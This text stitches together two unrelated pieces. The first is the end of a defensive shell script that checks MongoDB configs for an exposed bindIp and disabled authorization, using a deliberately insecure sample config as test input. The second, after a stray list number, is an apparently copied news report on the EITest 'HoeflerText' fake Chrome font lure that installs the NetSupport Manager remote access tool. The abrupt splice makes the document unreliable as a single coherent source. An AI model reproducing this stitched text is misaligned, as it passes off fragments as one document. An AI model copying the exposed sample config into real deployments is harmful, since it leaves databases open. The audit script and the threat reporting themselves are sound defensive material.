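                127.0.0.1|localhost|::1) ;;
                *) exposed=1 ;;
            esac
        done
    fi
    if [ "$exposed" -eq 1 ]; then
        echo "FAIL: net.bindIp='${bind:-<unset>}' exposes mongod to the network ($conf)"
        findings=$((findings+1))
    else
        echo "PASS: net.bindIp=$bind (loopback only) ($conf)"
    fi

    # security.authorization: without it every client is a full administrator
    if [ "$auth" = "enabled" ]; then
        echo "PASS: security.authorization=enabled ($conf)"
    else
        echo "FAIL: security.authorization='${auth:-<unset>}' (no authentication) ($conf)"
        findings=$((findings+1))
    fi
    return "$findings"
}

# Constructed sample configs (assumption of this example) so it runs offline.
write_mongod_samples() {
    dir=$1
    # exposed: all interfaces, security section commented out
    printf 'storage:\n  dbPath: /var/lib/mongo\nnet:\n  port: 27017\n  bindIp: 0.0.0.0\n#security:\n#  authorization: enabled\n' > "$dir/mongod-exposed.conf"
    # hardened: loopback only, authorization enabled
    printf 'storage:\n  dbPath: /var/lib/mongo\nnet:\n  port: 27017\n  bindIp: 127.0.0.1,::1\nsecurity:\n  authorization: enabled\n' > "$dir/mongod-hardened.conf"
}

# Stand-alone demo over the constructed samples.
tmp=$(mktemp -d)
write_mongod_samples "$tmp"
for f in "$tmp/mongod-exposed.conf" "$tmp/mongod-hardened.conf"; do
    rc=0; audit_mongod "$f" || rc=$?
    echo "findings: $rc"
done
rm -rf "$tmp"
```

A loopback-only bindIp is the right default for a database that an application on the same host talks to; a mongod that must be reached across the network still needs authorization enabled and a firewall rule limiting 27017 to the application hosts, which is exactly the combination the compromised instances lacked.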
  25. First spotted in December 2016, the attack is tied to the EITest compromise chain, and has been observed distributing the Fleercivet ad fraud malware and ransomware variants such as Spora and Mole. Initially targeting only Chrome, the campaign was expanded earlier this year to target Firefox users as well.

The attack relies on pop-ups being displayed in the Chrome browser on Windows devices, claiming that users need to install a so-called HoeflerText font pack. Code injected into compromised websites would make the visited pages look unreadable, thus making the fake pop-up seem legitimate. Fingerprinting capabilities included in the injected code trigger the attack only if certain criteria are met (targeted country, correct User-Agent (Chrome on Windows) and proper referer).

If the social engineering scheme is successful and the user agrees to install the fake font pack, a file named Font_Chrome.exe is downloaded and executed, and their system is infected with malware.

Starting in late August, the malware distributed via these fake Chrome font update notifications is the NetSupport Manager remote access tool (RAT). According to Palo Alto Networks' Brad Duncan, this should indicate "a potential shift in the motives of this adversary."

The most recent versions of Font_Chrome.exe are file downloaders designed to retrieve follow-up malware that installs NetSupport Manager. This commercially available RAT was previously associated with a campaign from hacked Steam accounts last year.

While analyzing the recent attack, Palo Alto's researchers discovered two variants of the file downloader and two instances of follow-up malware that install the RAT. Although the RAT is already at version 12.5, the version Chrome users are targeted with is version 11.0, the researchers discovered.

Chrome users on Windows systems should be suspicious of any pop-up messages that inform them the "HoeflerText" font wasn't found. Affected users aren't expected to notice a difference in their system's operation, given that this is a backdoor program, but that doesn't mean they weren't compromised.

Duncan also points out that RATs give attackers more capabilities on an infected host and also provide more flexibility compared with malware that has been designed for a single purpose, and that the recently observed change in the EITest HoeflerText pop-ups might suggest that ransomware is slightly less prominent than it once was.

Via http://www.securityweek.com/fake-chrome-font-update-attack-distributes-backdoor